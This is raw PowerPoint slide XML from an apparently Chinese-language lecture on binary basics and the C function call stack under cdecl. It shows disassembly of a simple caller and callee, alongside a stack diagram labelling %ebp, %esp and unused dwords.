        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5798417" y="3854941"/>
            <a:ext cx="2147980" cy="365600"/>
            <a:chOff x="3286490" y="1640558"/>
            <a:chExt cx="1610985" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="474" name="Shape 474"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3286490" y="1640558"/>
              <a:ext cx="1126200" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" b="1" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="FFFFFF"/>
                  </a:solidFill>
                  <a:highlight>
                    <a:srgbClr val="666666"/>
                  </a:highlight>
                  <a:latin typeface="Consolas"/>
                  <a:ea typeface="Consolas"/>
                  <a:cs typeface="Consolas"/>
                  <a:sym typeface="Consolas"/>
                </a:rPr>
                <a:t>%esp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="475" name="Shape 475"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1770756"/>
              <a:ext cx="484800" cy="6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sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="文本框 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{12369B57-76CE-4C87-A082-611225FBBB11}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="823118"/>
            <a:ext cx="46394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函数调用栈的工作方式（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cdecl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5F84F678-4E48-44DC-B906-834794C21955}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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栈溢出基础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| C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语言函数调用栈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C27CE4A0-64B0-4E4D-96E4-0F36E850BD62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1883229"/>
            <a:ext cx="12192000" cy="4974771"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:schemeClr val="tx2">
              <a:lumMod val="25000"/>
            </a:schemeClr>
          </a:solidFill>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx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62D3185-EEB2-4471-B209-5E958373A434}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="527342" y="387927"/>
            <a:ext cx="816576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7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Part</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="C00000"/>
                </a:solidFill>
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>1</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="7200" dirty="0">
                <a:latin typeface="Arial Black" panose="020B0A04020102020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>  </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="7200" dirty="0">
                <a:latin typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
                <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49" charset="-122"/>
              </a:rPr>
              <a:t>二进制基础</a:t>
            </a:r>
            <a:endParaRPr lang="zh-CN" altLang="en-US" sz="7200" dirty="0">
              <a:latin typeface="Consolas" panose="020B0609020204030204" pitchFamily="49" charset="0"/>
              <a:ea typeface="隶书" panose="02010509060101010101" pitchFamily="49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5D36EB4-0DC5-495B-89A6-4FB3A6A77B9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2502725" y="2635527"/>
            <a:ext cx="773083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程序的编译与链接</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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Linux</a:t>
            </a:r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下的可执行文件格式</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN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ELF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进程虚拟地址空间</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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程序的装载与进程的执行</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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x86&amp;amd64</a:t>
            </a:r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汇编简述</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN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4706058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Shape 481"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="4437733"/>
            <a:ext cx="4712800" cy="225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" sz="1333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00000000 &lt;callee&gt;:</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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0:   55          push   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1:   89 e5       mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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3:   8b 55 08    mov    0x8(%ebp),%edx</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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6:   8b 45 0c    mov    0xc(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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9:   01 c2       add    %eax,%edx</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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b:   8b 45 10    mov    0x10(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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e:   01 d0       add    %edx,%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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10:   5d          pop    %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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11:   c3          ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333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82" name="Shape 482"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="1443533"/>
            <a:ext cx="4712800" cy="31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" sz="1333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00000012 &lt;caller&gt;:</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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12:   55              push   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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13:   89 e5           mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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15:   83 ec 10        sub    $0x10,%esp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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18:   6a 03           push   $0x3</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1a:   6a 02           push   $0x2</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1c:   6a 01           push   $0x1</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1e:   e8 fc ff ff ff  call   1f &lt;callee&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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23:   83 c4 0c        add    $0xc,%esp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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26:   89 45 fc        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov    %eax,-0x4(%ebp)</a:t>
            </a:r>
            <a:endParaRPr sz="1333" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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29:   83 45 fc 04     </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>addl   $0x4,-0x4(%ebp)</a:t>
            </a:r>
            <a:endParaRPr sz="1333" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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2d:   8b 45 fc        </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>mov    -0x4(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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30:   c9              leave</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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31:   c3              ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333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83" name="Shape 483"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="1980133"/>
            <a:ext cx="2704800" cy="4096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%ebp in caller's caller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84" name="Shape 484"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2389733"/>
            <a:ext cx="2704800" cy="4096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  <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>ret = callee(1, 2, 3) + 4</a:t>
            </a:r>
            <a:endParaRPr sz="1867" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666"/>
              </a:highlight>
              <a:latin typeface="Arial"/>
              <a:cs typeface="Arial"/>
              <a:sym typeface="Arial"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="485" name="Shape 485"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2799333"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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86" name="Shape 486"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="3208933"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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87" name="Shape 487"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="3618533"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword</a:t>
            </a:r>
            <a:endParaRPr sz="1867" kern="0">
              <a:solidFill>
                <a:srgbClr val="666666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88" name="Shape 488"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="8655400" y="1485751"/>
            <a:ext cx="1286800" cy="3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Stack</a:t>
            </a:r>
            <a:endParaRPr sz="1867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89" name="Shape 489"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4028133"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword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90" name="Shape 490"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4437733"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword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91" name="Shape 491"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="4847333"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword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92" name="Shape 492"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="5256933"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword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93" name="Shape 493"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="5666533"/>
            <a:ext cx="2704800" cy="4096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666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword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grpSp>
        <p:nvGrpSpPr>
          <p:cNvPr id="494" name="Shape 494"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="6444800" y="2208367"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3771275" y="1633500"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="495" name="Shape 495"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3771275" y="1633500"/>
              <a:ext cx="641400" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" kern="0"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rPr>
                <a:t>%ebp</a:t>
              </a:r>
              <a:endParaRPr sz="1333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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="496" name="Shape 496"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1763700"/>
              <a:ext cx="484800" cy="6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497" name="Shape 497"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="-162933" y="3931181"/>
            <a:ext cx="1501600" cy="365600"/>
            <a:chOff x="3510225" y="1324000"/>
            <a:chExt cx="1126200" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="498" name="Shape 498"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3510225" y="1324000"/>
              <a:ext cx="641400" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" kern="0"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rPr>
                <a:t>%eip</a:t>
              </a:r>
              <a:endParaRPr sz="1333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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="499" name="Shape 499"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4151625" y="1454200"/>
              <a:ext cx="484800" cy="6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500" name="Shape 500"/>
          <p:cNvGrpSpPr/>
          <p:nvPr/>
        </p:nvGrpSpPr>
        <p:grpSpPr>
          <a:xfrm>
            <a:off x="5798417" y="3854941"/>
            <a:ext cx="2147980" cy="365600"/>
            <a:chOff x="3286490" y="1640558"/>
            <a:chExt cx="1610985" cy="274200"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="501" name="Shape 501"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="3286490" y="1640558"/>
              <a:ext cx="1126200" cy="27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r" defTabSz="1219170">
                <a:buClr>
                  <a:srgbClr val="000000"/>
                </a:buClr>
              </a:pPr>
              <a:r>
                <a:rPr lang="en" sz="1333" kern="0">
                  <a:solidFill>
                    <a:srgbClr val="000000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%esp</a:t>
              </a:r>
              <a:endParaRPr sz="1333" kern="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cxnSp>
          <p:nvCxnSpPr>
            <p:cNvPr id="502" name="Shape 502"/>
            <p:cNvCxnSpPr/>
            <p:nvPr/>
          </p:nvCxnSpPr>
          <p:spPr>
            <a:xfrm rot="10800000" flipH="1">
              <a:off x="4412675" y="1770756"/>
              <a:ext cx="484800" cy="6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sp>
        <p:nvSpPr>
          <p:cNvPr id="503" name="Shape 503"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5505033" y="3343251"/>
            <a:ext cx="2349200" cy="32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333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%eax = callee(1, 2, 3)</a:t>
            </a:r>
            <a:endParaRPr sz="1333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79FEEB0B-2ABC-4B7B-86D8-759B21F8357E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="823118"/>
            <a:ext cx="46394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函数调用栈的工作方式（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cdecl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AC02F2C6-0FCC-48A4-811B-56B73B4EE3BC}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="10886"/>
            <a:ext cx="56388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栈溢出基础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| C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语言函数调用栈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Shape 509"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="4437733"/>
            <a:ext cx="4712800" cy="225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" sz="1333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00000000 &lt;callee&gt;:</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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0:   55          push   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1:   89 e5       mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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3:   8b 55 08    mov    0x8(%ebp),%edx</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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6:   8b 45 0c    mov    0xc(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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9:   01 c2       add    %eax,%edx</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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b:   8b 45 10    mov    0x10(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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e:   01 d0       add    %edx,%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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10:   5d          pop    %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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11:   c3          ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333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10" name="Shape 510"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1068000" y="1443533"/>
            <a:ext cx="4712800" cy="31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" sz="1333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00000012 &lt;caller&gt;:</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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12:   55              push   %ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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13:   89 e5           mov    %esp,%ebp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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15:   83 ec 10        sub    $0x10,%esp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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18:   6a 03           push   $0x3</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1a:   6a 02           push   $0x2</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1c:   6a 01           push   $0x1</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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1e:   e8 fc ff ff ff  call   1f &lt;callee&gt;</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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23:   83 c4 0c        add    $0xc,%esp</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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26:   89 45 fc        mov    %eax,-0x4(%ebp)</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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29:   83 45 fc 04     addl   $0x4,-0x4(%ebp)</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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2d:   8b 45 fc        mov    -0x4(%ebp),%eax</a:t>
            </a:r>
            <a:endParaRPr sz="1333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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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30:   c9              </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en" sz="1333" b="1" kern="0">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:highlight>
                  <a:srgbClr val="666666"/>
                </a:highlight>
                <a:latin typeface="Consolas"/>
                <a:ea typeface="Consolas"/>
                <a:cs typeface="Consolas"/>
                <a:sym typeface="Consolas"/>
              </a:rPr>
              <a:t>leave</a:t>
            </a:r>
            <a:endParaRPr sz="1333" b="1" kern="0">
              <a:solidFill>
                <a:srgbClr val="FFFFFF"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="666666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buClr>
                <a:srgbClr val="000000"/>
              </a:buClr>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1333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31:   c3              ret</a:t>
            </a:r>
            <a:endParaRPr sz="1333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11" name="Shape 511"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="1980133"/>
            <a:ext cx="2704800" cy="4096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%ebp in caller's caller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12" name="Shape 512"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7946400" y="2389733"/>
            <a:ext cx="2704800" cy="4096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  <a:buSzPts val="1100"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en" sz="1867" kern="0">
                <a:solidFill>
                  <a:srgbClr val="666666"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
                <a:sym typeface="Arial"/>
              </a:rPr>
              <a:t>unused dword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13" name="Shape 513"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
